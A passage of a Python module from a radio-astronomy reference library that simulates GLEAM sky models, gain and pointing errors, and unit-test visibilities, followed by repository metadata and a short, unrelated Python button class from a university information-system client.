def create_low_test_skymodel_from_gleam(npixel=512, polarisation_frame=PolarisationFrame("stokesI"),
                                        cellsize=0.000015,
                                        frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),
                                        phasecentre=None, kind='cubic', applybeam=True, flux_limit=0.1,
                                        flux_max=numpy.inf, flux_threshold=1.0, insert_method='Nearest',
                                        telescope='LOW') -> SkyModel:
    """Create LOW test skymodel from the GLEAM survey

    Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero.

    See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier.

    VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016)

    GaLactic and Extragalactic All-sky Murchison Wide Field Array (GLEAM) survey. I: A low-frequency extragalactic
    catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H

    :param telescope:
    :param npixel: Number of pixels
    :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
    :param cellsize: cellsize in radians
    :param frequency:
    :param channel_bandwidth: Channel width (Hz)
    :param phasecentre: phasecentre (SkyCoord)
    :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: cubic
    :param applybeam: Apply the primary beam?
    :param flux_limit: Weakest component
    :param flux_max: Maximum strength component to be included in components
    :param flux_threshold: Split between components (brighter) and image (weaker)
    :param insert_method: Nearest | PSWF | Lanczos
    :return: SkyModel
    """

    if phasecentre is None:
        phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')

    radius = npixel * cellsize

    sc = create_low_test_skycomponents_from_gleam(flux_limit=flux_limit,
                                                  polarisation_frame=polarisation_frame,
                                                  frequency=frequency, phasecentre=phasecentre,
                                                  kind=kind, radius=radius)

    sc = filter_skycomponents_by_flux(sc, flux_max=flux_max)
    if polarisation_frame is None:
        polarisation_frame = PolarisationFrame("stokesI")

    npol = polarisation_frame.npol
    nchan = len(frequency)
    shape = [nchan, npol, npixel, npixel]
    w = WCS(naxis=4)
    # The negation in the longitude is needed by definition of RA, DEC
    w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]
    w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]
    w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ']
    w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]
    w.naxis = 4
    w.wcs.radesys = 'ICRS'
    w.wcs.equinox = 2000.0

    model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)

    if applybeam:
        beam = create_pb(model, telescope=telescope, use_local=False)
        sc = apply_beam_to_skycomponent(sc, beam)

    weaksc = filter_skycomponents_by_flux(sc, flux_max=flux_threshold)
    brightsc = filter_skycomponents_by_flux(sc, flux_min=flux_threshold)
    model = insert_skycomponent(model, weaksc, insert_method=insert_method)

    log.info('create_low_test_skymodel_from_gleam: %d bright sources above flux threshold %.3f, %d weak sources below '
             % (len(brightsc), flux_threshold, len(weaksc)))

    return SkyModel(components=brightsc, image=model, mask=None, gaintable=None)


def create_low_test_skycomponents_from_gleam(flux_limit=0.1, polarisation_frame=PolarisationFrame("stokesI"),
                                             frequency=numpy.array([1e8]), kind='cubic', phasecentre=None,
                                             radius=1.0) \
        -> List[Skycomponent]:
    """Create sky components from the GLEAM survey

    Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero.

    See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier.

    VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016)

    GaLactic and Extragalactic All-sky Murchison Wide Field Array (GLEAM) survey. I: A low-frequency extragalactic
    catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H

    :param flux_limit: Only write components brighter than this (Jy)
    :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
    :param frequency: Frequencies at which the flux will be estimated
    :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: cubic
    :param phasecentre: Desired phase centre (SkyCoord) default None implies all sources
    :param radius: Radius of sources selected around phasecentre (default 1.0 rad)
    :return: List of Skycomponents
    """

    fitsfile = arl_path("data/models/GLEAM_EGC.fits")

    rad2deg = 180.0 / numpy.pi
    decmin = phasecentre.dec.to('deg').value - rad2deg * radius / 2.0
    decmax = phasecentre.dec.to('deg').value + rad2deg * radius / 2.0

    hdulist = fits.open(fitsfile, lazy_load_hdus=False)
    recs = hdulist[1].data[0].array

    fluxes = recs['peak_flux_wide']

    mask = fluxes > flux_limit
    filtered_recs = recs[mask]

    decs = filtered_recs['DEJ2000']
    mask = decs > decmin
    filtered_recs = filtered_recs[mask]

    decs = filtered_recs['DEJ2000']
    mask = decs < decmax
    filtered_recs = filtered_recs[mask]

    ras = filtered_recs['RAJ2000']
    decs = filtered_recs['DEJ2000']
    names = filtered_recs['Name']

    if polarisation_frame is None:
        polarisation_frame = PolarisationFrame("stokesI")

    npol = polarisation_frame.npol

    nchan = len(frequency)

    # For every source, we read all measured fluxes and interpolate to the
    # required frequencies
    gleam_freqs = numpy.array([76, 84, 92, 99, 107, 115, 122, 130, 143, 151, 158, 166, 174, 181, 189, 197, 204,
                               212, 220, 227])
    gleam_flux_freq = numpy.zeros([len(names), len(gleam_freqs)])
    for i, f in enumerate(gleam_freqs):
        gleam_flux_freq[:, i] = filtered_recs['int_flux_%03d' % (f)][:]

    skycomps = []

    directions = SkyCoord(ra=ras * u.deg, dec=decs * u.deg)
    if phasecentre is not None:
        separations = directions.separation(phasecentre).to('rad').value
    else:
        separations = numpy.zeros(len(names))

    for isource, name in enumerate(names):
        direction = directions[isource]
        if separations[isource] < radius:
            fint = interpolate.interp1d(gleam_freqs * 1.0e6, gleam_flux_freq[isource, :], kind=kind)
            flux = numpy.zeros([nchan, npol])
            flux[:, 0] = fint(frequency)
            if not numpy.isnan(flux).any():
                skycomps.append(Skycomponent(direction=direction, flux=flux, frequency=frequency,
                                             name=name, shape='Point',
                                             polarisation_frame=polarisation_frame))

    log.info('create_low_test_skycomponents_from_gleam: %d sources above flux limit %.3f' %
             (len(skycomps), flux_limit))

    hdulist.close()

    return skycomps
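

# Hypothetical usage sketch (illustrative only, not from the original module): selecting
# bright GLEAM components within 0.1 rad of a chosen phase centre. Values are assumptions.
def _example_gleam_components():
    centre = SkyCoord(ra=+15.0 * u.deg, dec=-45.0 * u.deg, frame='icrs', equinox='J2000')
    return create_low_test_skycomponents_from_gleam(flux_limit=1.0,
                                                    frequency=numpy.array([1e8]),
                                                    phasecentre=centre, radius=0.1)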


def replicate_image(im: Image, polarisation_frame=PolarisationFrame('stokesI'), frequency=numpy.array([1e8])) \
        -> Image:
    """ Make a new canonical shape Image, extended along third and fourth axes by replication.

    The order of the data is [chan, pol, dec, ra]

    :param frequency:
    :param im:
    :param polarisation_frame: Polarisation_frame
    :return: Image
    """

    if len(im.data.shape) == 2:
        fim = Image()

        newwcs = WCS(naxis=4)

        newwcs.wcs.crpix = [im.wcs.wcs.crpix[0] + 1.0, im.wcs.wcs.crpix[1] + 1.0, 1.0, 1.0]
        newwcs.wcs.cdelt = [im.wcs.wcs.cdelt[0], im.wcs.wcs.cdelt[1], 1.0, 1.0]
        newwcs.wcs.crval = [im.wcs.wcs.crval[0], im.wcs.wcs.crval[1], 1.0, frequency[0]]
        newwcs.wcs.ctype = [im.wcs.wcs.ctype[0], im.wcs.wcs.ctype[1], 'STOKES', 'FREQ']

        nchan = len(frequency)
        npol = polarisation_frame.npol
        fim.polarisation_frame = polarisation_frame

        fim.wcs = newwcs
        fshape = [nchan, npol, im.data.shape[1], im.data.shape[0]]
        fim.data = numpy.zeros(fshape)
        log.info("replicate_image: replicating shape %s to %s" % (im.data.shape, fim.data.shape))
        for i3 in range(nchan):
            fim.data[i3, 0, :, :] = im.data[:, :]
        return fim
    else:
        return im


def create_blockvisibility_iterator(config: Configuration, times: numpy.array, frequency: numpy.array,
                                    channel_bandwidth, phasecentre: SkyCoord, weight: float = 1,
                                    polarisation_frame=PolarisationFrame('stokesI'), integration_time=1.0,
                                    number_integrations=1, predict=predict_2d, model=None, components=None,
                                    phase_error=0.0, amplitude_error=0.0, sleep=0.0, **kwargs):
    """ Create a sequence of Visibilities and optionally predicting and coalescing

    This is useful mainly for performing large simulations. Do something like::

        vis_iter = create_blockvisibility_iterator(config, times, frequency, channel_bandwidth,
                                                   phasecentre=phasecentre, weight=1.0,
                                                   integration_time=30.0, number_integrations=3)

        for i, vis in enumerate(vis_iter):
            if i == 0:
                fullvis = vis
            else:
                fullvis = append_visibility(fullvis, vis)

    :param config: Configuration of antennas
    :param times: hour angles in radians
    :param frequency: frequencies (Hz) Shape [nchan]
    :param weight: weight of a single sample
    :param phasecentre: phasecentre of observation
    :param polarisation_frame: Polarisation frame (default PolarisationFrame('stokesI'))
    :param integration_time: Integration time ('auto' or value in s)
    :param number_integrations: Number of integrations to be created at each time.
    :param model: Model image to be inserted
    :param components: Components to be inserted
    :param sleep: Time to sleep between yields
    :return: Visibility
    """
    for time in times:
        actualtimes = time + numpy.arange(0, number_integrations) * integration_time * numpy.pi / 43200.0
        bvis = create_blockvisibility(config, actualtimes, frequency=frequency, phasecentre=phasecentre,
                                      weight=weight, polarisation_frame=polarisation_frame,
                                      integration_time=integration_time, channel_bandwidth=channel_bandwidth)

        if model is not None:
            vis = convert_blockvisibility_to_visibility(bvis)
            vis = predict(vis, model, **kwargs)
            bvis = convert_visibility_to_blockvisibility(vis)

        if components is not None:
            bvis = predict_skycomponent_visibility(bvis, components)

        # Add phase errors
        if phase_error > 0.0 or amplitude_error > 0.0:
            gt = create_gaintable_from_blockvisibility(bvis)
            gt = simulate_gaintable(gt=gt, phase_error=phase_error, amplitude_error=amplitude_error)
            bvis = apply_gaintable(bvis, gt)

        import time
        time.sleep(sleep)

        yield bvis


def simulate_gaintable(gt: GainTable, phase_error=0.1, amplitude_error=0.0, smooth_channels=1, leakage=0.0,
                       **kwargs) -> GainTable:
    """ Simulate a gain table

    :type gt: GainTable
    :param phase_error: std of normal distribution, zero mean
    :param amplitude_error: std of log normal distribution
    :param leakage: std of cross hand leakage
    :param smooth_channels: Use bspline over smooth_channels
    :param kwargs:
    :return: Gaintable
    """

    def moving_average(a, n=3):
        return numpy.convolve(a, numpy.ones((n,)) / n, mode='valid')

    log.debug("simulate_gaintable: Simulating amplitude error = %.4f, phase error = %.4f"
              % (amplitude_error, phase_error))
    amps = 1.0
    phases = 1.0
    ntimes, nant, nchan, nrec, _ = gt.data['gain'].shape
    if phase_error > 0.0:
        phases = numpy.zeros(gt.data['gain'].shape)
        for time in range(ntimes):
            for ant in range(nant):
                phase = numpy.random.normal(0, phase_error, nchan + int(smooth_channels) - 1)
                if smooth_channels > 1:
                    phase = moving_average(phase, smooth_channels)
                phases[time, ant, ...] = phase[..., numpy.newaxis, numpy.newaxis]

    if amplitude_error > 0.0:
        amps = numpy.ones(gt.data['gain'].shape, dtype='complex')
        for time in range(ntimes):
            for ant in range(nant):
                amp = numpy.random.lognormal(mean=0.0, sigma=amplitude_error,
                                             size=nchan + int(smooth_channels) - 1)
                if smooth_channels > 1:
                    amp = moving_average(amp, smooth_channels)
                    amp = amp / numpy.average(amp)
                amps[time, ant, ...] = amp[..., numpy.newaxis, numpy.newaxis]

    gt.data['gain'] = amps * numpy.exp(0 + 1j * phases)
    nrec = gt.data['gain'].shape[-1]
    if nrec > 1:
        if leakage > 0.0:
            leak = numpy.random.normal(0, leakage, gt.data['gain'][..., 0, 0].shape) + 1j * \
                   numpy.random.normal(0, leakage, gt.data['gain'][..., 0, 0].shape)
            gt.data['gain'][..., 0, 1] = gt.data['gain'][..., 0, 0] * leak
            leak = numpy.random.normal(0, leakage, gt.data['gain'][..., 1, 1].shape) + 1j * \
                   numpy.random.normal(0, leakage, gt.data['gain'][..., 1, 1].shape)
            gt.data['gain'][..., 1, 0] = gt.data['gain'][..., 1, 1] * leak
        else:
            gt.data['gain'][..., 0, 1] = 0.0
            gt.data['gain'][..., 1, 0] = 0.0

    return gt


def simulate_pointingtable(pt: PointingTable, pointing_error, static_pointing_error=None, global_pointing_error=None,
                           seed=None, **kwargs) -> PointingTable:
    """ Simulate a pointing table

    :type pt: PointingTable
    :param pointing_error: std of normal distribution (radians)
    :param static_pointing_error: std of normal distribution (radians)
    :param global_pointing_error: 2-vector of global pointing error (rad)
    :param kwargs:
    :return: PointingTable
    """
    if seed is not None:
        numpy.random.seed(seed)

    if static_pointing_error is None:
        static_pointing_error = [0.0, 0.0]

    r2s = 180.0 * 3600.0 / numpy.pi
    pt.data['pointing'] = numpy.zeros(pt.data['pointing'].shape)

    ntimes, nant, nchan, nrec, _ = pt.data['pointing'].shape
    if pointing_error > 0.0:
        log.debug("simulate_pointingtable: Simulating dynamic pointing error = %g (rad) %g (arcsec)"
                  % (pointing_error, r2s * pointing_error))

        pt.data['pointing'] += numpy.random.normal(0.0, pointing_error, pt.data['pointing'].shape)
    if (abs(static_pointing_error[0]) > 0.0) or (abs(static_pointing_error[1]) > 0.0):
        numpy.random.seed(18051955)
        log.debug("simulate_pointingtable: Simulating static pointing error = (%g, %g) (rad) (%g, %g)(arcsec)"
                  % (static_pointing_error[0], static_pointing_error[1],
                     r2s * static_pointing_error[0], r2s * static_pointing_error[1]))

        static_pe = numpy.zeros(pt.data['pointing'].shape[1:])
        static_pe[..., 0] = numpy.random.normal(0.0, static_pointing_error[0],
                                                static_pe[..., 0].shape)[numpy.newaxis, ...]
        static_pe[..., 1] = numpy.random.normal(0.0, static_pointing_error[1],
                                                static_pe[..., 1].shape)[numpy.newaxis, ...]
        pt.data['pointing'] += static_pe

    if global_pointing_error is not None:
        if seed is not None:
            numpy.random.seed(seed)

        log.debug("simulate_pointingtable: Simulating global pointing error = [%g, %g] (rad) [%g, %g] (arcsec)"
                  % (global_pointing_error[0], global_pointing_error[1],
                     r2s * global_pointing_error[0], r2s * global_pointing_error[1]))
        pt.data['pointing'][..., :] += global_pointing_error

    return pt
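

# Hypothetical usage sketch (illustrative only, not part of the original module):
# corrupting a BlockVisibility with random gain errors, using helpers already used
# elsewhere in this module. The error levels below are assumptions.
def _example_corrupt_with_gain_errors(bvis):
    gt = create_gaintable_from_blockvisibility(bvis)
    gt = simulate_gaintable(gt, phase_error=0.1, amplitude_error=0.01, smooth_channels=4)
    return apply_gaintable(bvis, gt)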


def simulate_pointingtable_from_timeseries(pt, type='wind', time_series_type='precision',
                                           pointing_directory=None, reference_pointing=False,
                                           seed=None):
    """Create a pointing table with time series created from PSD.

    :param pt: Pointing table to be filled
    :param type: Type of pointing: 'tracking' or 'wind'
    :param pointing_directory: Name of pointing file directory
    :param reference_pointing: Use reference pointing?
    :return:
    """
    if seed is not None:
        numpy.random.seed(seed)

    if pointing_directory is None:
        pointing_directory = arl_path("data/models/%s" % time_series_type)

    pt.data['pointing'] = numpy.zeros(pt.data['pointing'].shape)

    ntimes, nant, nchan, nrec, _ = pt.data['pointing'].shape

    # Use az and el at the beginning of this pointingtable
    axis_values = pt.nominal[0, 0, 0, 0, 0]
    el = pt.nominal[0, 0, 0, 0, 1]

    el_deg = el * 180.0 / numpy.pi
    az_deg = axis_values * 180.0 / numpy.pi

    if el_deg < 30.0:
        el_deg = 15.0
    elif el_deg < (90.0 + 45.0) / 2.0:
        el_deg = 45.0
    else:
        el_deg = 90.0

    if abs(az_deg) < 45.0 / 2.0:
        az_deg = 0.0
    elif abs(az_deg) < (45.0 + 90.0) / 2.0:
        az_deg = 45.0
    elif abs(az_deg) < (90.0 + 135.0) / 2.0:
        az_deg = 90.0
    elif abs(az_deg) < (135.0 + 180.0) / 2.0:
        az_deg = 135.0
    else:
        az_deg = 180.0

    pointing_file = '%s/El%dAz%d.dat' % (pointing_directory, int(el_deg), int(az_deg))
    log.debug("simulate_pointingtable_from_timeseries: Reading wind PSD from %s" % pointing_file)
    psd = numpy.loadtxt(pointing_file)

    # define some arrays
    freq = psd[:, 0]
    axesdict = {
        "az": psd[:, 1],
        "el": psd[:, 2],
        "pxel": psd[:, 3],
        "pel": psd[:, 4]
    }

    if type == 'tracking':
        axes = ["az", "el"]
    elif type == 'wind':
        axes = ["pxel", "pel"]
    else:
        raise ValueError("Pointing type %s not known" % type)

    freq_interval = 0.0001

    for axis in axes:

        axis_values = axesdict[axis]

        if (axis == "az") or (axis == "el"):
            # determine index of maximum PSD value; add 50 for better fit
            axis_values_max_index = numpy.argwhere(axis_values == numpy.max(axis_values))[0][0] + 50
            axis_values_max_index = min(axis_values_max_index, len(axis_values))
            # max_freq = 2.0 / pt.interval[0]
            max_freq = 0.4
            freq_max_index = numpy.argwhere(freq > max_freq)[0][0]
        else:
            break_freq = 0.01  # not max; just a break
            axis_values_max_index = numpy.argwhere(freq > break_freq)[0][0]
            # max_freq = 2.0 / pt.interval[0]
            max_freq = 0.1
            freq_max_index = numpy.argwhere(freq > max_freq)[0][0]

        # construct regularly-spaced frequencies
        regular_freq = numpy.arange(freq[0], freq[freq_max_index], freq_interval)

        regular_axis_values_max_index = numpy.argwhere(
            numpy.abs(regular_freq - freq[axis_values_max_index]) == numpy.min(
                numpy.abs(regular_freq - freq[axis_values_max_index])))[0][0]

        # print ('Frequency break: ', freq[az_max_index])
        # print ('Max frequency: ', max_freq)
        #
        # print ('New frequency break: ', regular_freq[regular_az_max_index])
        # print ('New max frequency: ', regular_freq[-1])

        if axis_values_max_index >= freq_max_index:
            raise ValueError('Frequency break is higher than highest frequency; select a lower break')

        # use original frequency break and max frequency to fit function
        # fit polynomial to psd up to max value
        import warnings
        from numpy import RankWarning
        warnings.simplefilter('ignore', RankWarning)

        p_axis_values1 = numpy.polyfit(freq[:axis_values_max_index],
                                       numpy.log(axis_values[:axis_values_max_index]), 5)
        f_axis_values1 = numpy.poly1d(p_axis_values1)
        # fit polynomial to psd beyond max value
        p_axis_values2 = numpy.polyfit(freq[axis_values_max_index:freq_max_index],
                                       numpy.log(axis_values[axis_values_max_index:freq_max_index]), 5)
        f_axis_values2 = numpy.poly1d(p_axis_values2)

        # use new frequency break and max frequency to apply function (ensures equal spacing of frequency intervals)
        # resampled to construct regularly-spaced frequencies
        regular_axis_values1 = numpy.exp(f_axis_values1(regular_freq[:regular_axis_values_max_index]))
        regular_axis_values2 = numpy.exp(f_axis_values2(regular_freq[regular_axis_values_max_index:]))

        # join
        regular_axis_values = numpy.append(regular_axis_values1, regular_axis_values2)

        M0 = len(regular_axis_values)

        # check rms of resampled PSD
        # df = regular_freq[1:]-regular_freq[:-1]
        # psd2rms_pxel = numpy.sqrt(numpy.sum(regular_az[:-1]*df))
        # print ('Calculate rms of resampled PSD: ', psd2rms_pxel)

        original_regular_freq = regular_freq
        original_regular_axis_values = regular_axis_values
        # get amplitudes from psd values

        if (regular_axis_values < 0).any():
            raise ValueError('Resampling returns negative power values; change fit range')

        amp_axis_values = numpy.sqrt(regular_axis_values * 2 * freq_interval)
        # need to scale PSD by 2* frequency interval before square rooting, then by number of modes in resampled PSD

        # Now we generate some random phases
        for ant in range(nant):
            regular_freq = original_regular_freq
            regular_axis_values = original_regular_axis_values
            phi_axis_values = numpy.random.rand(len(regular_axis_values)) * 2 * numpy.pi
            # create complex array
            z_axis_values = amp_axis_values * numpy.exp(1j * phi_axis_values)  # polar
            # make symmetrical frequencies
            mirror_z_axis_values = numpy.copy(z_axis_values)
            # make complex conjugates
            mirror_z_axis_values.imag -= 2 * z_axis_values.imag
            # make negative frequencies
            mirror_regular_freq = -regular_freq
            # join
            z_axis_values = numpy.append(z_axis_values, mirror_z_axis_values[::-1])
            regular_freq = numpy.append(regular_freq, mirror_regular_freq[::-1])

            # add a 0 Fourier term
            z_axis_values = numpy.append(0 + 0 * 1j, z_axis_values)
            regular_freq = numpy.append(0, regular_freq)

            # perform inverse fft
            ts = numpy.fft.ifft(z_axis_values)

            # set up and check scalings
            N = len(ts)
            Dt = pt.interval[0]
            ts = numpy.real(ts)
            ts *= M0  # the result is scaled by number of points in the signal, so multiply - real part - by this

            # The output of the iFFT will be a random time series on the finite
            # (bounded, limited) time interval t = 0 to tmax = (N-1) X Dt,
            # where Dt = 1 / (2 X Fmax)

            # scale to time interval
            times = numpy.arange(ntimes) * Dt

            # Convert from arcsec to radians
            ts *= numpy.pi / (180.0 * 3600.0)

            # We take reference pointing to mean that the pointing errors are zero at the beginning
            # of the set of integrations
            if reference_pointing:
                ts[:] -= ts[0]

            # pt.data['time'] = times[:ntimes]
            if axis == 'az':
                pt.data['pointing'][:, ant, :, :, 0] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...]
            elif axis == 'el':
                pt.data['pointing'][:, ant, :, :, 1] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...]
            elif axis == 'pxel':
                pt.data['pointing'][:, ant, :, :, 0] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...]
            elif axis == 'pel':
                pt.data['pointing'][:, ant, :, :, 1] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...]
            else:
                raise ValueError("Unknown axis %s" % axis)

    return pt


def ingest_unittest_visibility(config, frequency, channel_bandwidth, times, vis_pol, phasecentre, block=False,
                               zerow=False):
    if block:
        vt = create_blockvisibility(config, times, frequency, channel_bandwidth=channel_bandwidth,
                                    phasecentre=phasecentre, weight=1.0,
                                    polarisation_frame=vis_pol, zerow=zerow)
    else:
        vt = create_visibility(config, times, frequency, channel_bandwidth=channel_bandwidth,
                               phasecentre=phasecentre, weight=1.0,
                               polarisation_frame=vis_pol, zerow=zerow)
    vt.data['vis'][...] = 0.0
    return vt


def create_unittest_components(model, flux, applypb=False, telescope='LOW', npixel=None,
                               scale=1.0, single=False, symmetric=False, angular_scale=1.0):
    # Fill the visibility with exactly computed point sources.

    if npixel is None:
        _, _, _, npixel = model.data.shape
    spacing_pixels = int(scale * npixel) // 4
    log.info('Spacing in pixels = %s' % spacing_pixels)

    if not symmetric:
        centers = [(0.2 * angular_scale, 1.1 * angular_scale)]
    else:
        centers = list()

    if not single:
        centers.append([0.0, 0.0])

        for x in numpy.linspace(-1.2 * angular_scale, 1.2 * angular_scale, 7):
            if abs(x) > 1e-15:
                centers.append([x, x])
                centers.append([x, -x])
    model_pol = model.polarisation_frame
    # Make the list of components
    rpix = model.wcs.wcs.crpix
    components = []
    for center in centers:
        ix, iy = center
        # The phase center in 0-relative coordinates is n // 2 so we centre the grid of
        # components on ny // 2, nx // 2. The wcs must be defined consistently.
        p = int(round(rpix[0] + ix * spacing_pixels * numpy.sign(model.wcs.wcs.cdelt[0]))), \
            int(round(rpix[1] + iy * spacing_pixels * numpy.sign(model.wcs.wcs.cdelt[1])))
        sc = pixel_to_skycoord(p[0], p[1], model.wcs, origin=1)
        log.info("Component at (%f, %f) [0-rel] %s" % (p[0], p[1], str(sc)))

        # Channel images
        comp = create_skycomponent(direction=sc, flux=flux, frequency=model.frequency,
                                   polarisation_frame=model_pol)
        components.append(comp)

    if applypb:
        beam = create_pb(model, telescope=telescope, use_local=False)
        components = apply_beam_to_skycomponent(components, beam)

    return components


def create_unittest_model(vis, model_pol, npixel=None, cellsize=None, nchan=1):
    advice = advise_wide_field(vis, guard_band_image=2.0, delA=0.02, facets=1,
                               wprojection_planes=1, oversampling_synthesised_beam=4.0)
    if cellsize is None:
        cellsize = advice['cellsize']
    if npixel is None:
        npixel = advice['npixels2']
    model = create_image_from_visibility(vis, npixel=npixel, cellsize=cellsize, nchan=nchan,
                                         polarisation_frame=model_pol)
    return model


def insert_unittest_errors(vt, seed=180555, calibration_context="TG", amp_errors=None, phase_errors=None):
    """Simulate gain errors and apply

    :param vt:
    :param seed: Random number seed: a fixed large integer makes the errors repeatable from run to run
    :param phase_errors: e.g. {'T': 1.0, 'G': 0.1, 'B': 0.01}
    :param amp_errors: e.g. {'T': 0.0, 'G': 0.01, 'B': 0.01}
    :return:
    """
    controls = create_calibration_controls()

    if amp_errors is None:
        amp_errors = {'T': 0.0, 'G': 0.01, 'B': 0.01}

    if phase_errors is None:
        phase_errors = {'T': 1.0, 'G': 0.1, 'B': 0.01}

    for c in calibration_context:
        gaintable = create_gaintable_from_blockvisibility(vt, timeslice=controls[c]['timeslice'])
        gaintable = simulate_gaintable(gaintable,
                                       phase_error=phase_errors[c],
                                       amplitude_error=amp_errors[c],
                                       timeslice=controls[c]['timeslice'],
                                       phase_only=controls[c]['phase_only'],
                                       crosspol=controls[c]['shape'] == 'matrix')

        vt = apply_gaintable(vt, gaintable, timeslice=controls[c]['timeslice'], inverse=True)

    return vt
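

# Hypothetical end-to-end sketch (illustrative only, not part of the original module):
# make an empty unit-test visibility and corrupt it with T and G gain errors.
# `config`, `frequency`, `channel_bandwidth`, `times` and `phasecentre` are assumed
# to be supplied by the caller.
def _example_unittest_visibility_with_errors(config, frequency, channel_bandwidth, times, phasecentre):
    vt = ingest_unittest_visibility(config, frequency, channel_bandwidth, times,
                                    PolarisationFrame('stokesI'), phasecentre, block=True)
    return insert_unittest_errors(vt, seed=180555, calibration_context="TG")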
SKA-ScienceDataProcessor/algorithm-reference-library
processing_components/simulation/testing_support.py
Python
apache-2.0
47,842
0.007504
from aisikl.events import action_event
from .actionablecontrol import ActionableControl


class Button(ActionableControl):
    def __init__(self, dialog, id, type, parent_id, properties, element):
        super().__init__(dialog, id, type, parent_id, properties, element)
        self.image = properties.get('img')
        self.confirm_question = element.get('confirmquestion')
        self.access_key = element.get('accesskey')
        if isinstance(self.access_key, list):
            self.access_key = ' '.join(self.access_key)   # BeautifulSoup :(

    def _ais_setAccessKey(self, value):
        self.access_key = value

    def _ais_setImage(self, value):
        self.image = value

    def _ais_setConfirmQuestion(self, value):
        self.confirm_question = value

    def click(self):
        self.log('action', 'Clicking {}'.format(self.id))
        if self.try_execute_action():
            return
        ev = action_event(self, None, self.id)
        # TODO: We should technically ask confirm_question before firing
        # (if ev.listening is True), but we probably don't care.
        self.dialog.app.send_events(ev)

    # Note that showPopupMenus() is unsupported. Use menu items directly.
fmfi-svt/votr
aisikl/components/button.py
Python
apache-2.0
1,203
0.002494